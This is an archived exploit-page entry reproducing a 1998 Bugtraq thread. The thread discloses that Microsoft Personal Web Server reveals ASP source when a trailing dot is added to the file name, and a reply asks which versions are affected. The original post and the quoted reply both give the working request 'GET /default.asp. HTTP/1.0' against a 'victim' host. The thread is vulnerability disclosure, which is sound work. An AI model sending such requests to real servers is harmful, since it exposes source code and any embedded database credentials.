dot bug in MS Personal Web Server

Summary
Description:IIS 3.0 had a bug which allowed ASP source to be downloaded by appending a . to the filename. That was eventually fixed by MS but they didn't fix the same hole in their Personal Web Server.
Author:Lynn Kyle <lynn@RAINC.COM>
Compromise:Read ASP file source, could contain passwords, etc.
Vulnerable Systems:Those running vulnerable version of MS Personal Web Server
Date:22 March 1998
Details


Date: Sun, 22 Mar 1998 10:15:01 -0700
From: Lynn Kyle <lynn@RAINC.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: MS Personal Web Server

Has this been reported?

The MS Personal Web Server (tried on the win95, not NT) suffers
from the old IIS 3.0 unpatched bug of allowing you to download
asp files by using a trailing ".".

e.g.,

telnet victim 80
GET /default.asp. HTTP/1.0

will give you the contents of the asp not the result.
oops for any of you embedding a db login/pass in the asp.

Mike
Date: Mon, 23 Mar 1998 02:20:56 -0300
From: "Rubens Kuhl Jr." <rkuhljr@PUERIDOMUS.BR>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: MS Personal Web Server

What version of MS PWS does this apply to ?

NT Option Pack includes IIS 4.0 for NT Server, PWS 4.0 for NT Workstation
and PWS 4.0 for Windows 95, and I would think (although I haven't tested to
be sure) that this doesn't affect PWS 4.0/Win95.



Rubens Kuhl Jr.


> -----Original Message-----
> From: Lynn Kyle [SMTP:lynn@RAINC.COM]
> Sent: Sunday, March 22, 1998 2:15 PM
> To:   BUGTRAQ@NETSPACE.ORG
> Subject:      MS Personal Web Server
>
> Has this been reported?
>
> The MS Personal Web Server (tried on the win95, not NT) suffers
> from the old IIS 3.0 unpatched bug of allowing you to download
> asp files by using a trailing ".".
>
> e.g.,
>
> telnet victim 80
> GET /default.asp. HTTP/1.0
>
> will give you the contents of the asp not the result.
> oops for any of you embedding a db login/pass in the asp.
>
> Mike

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault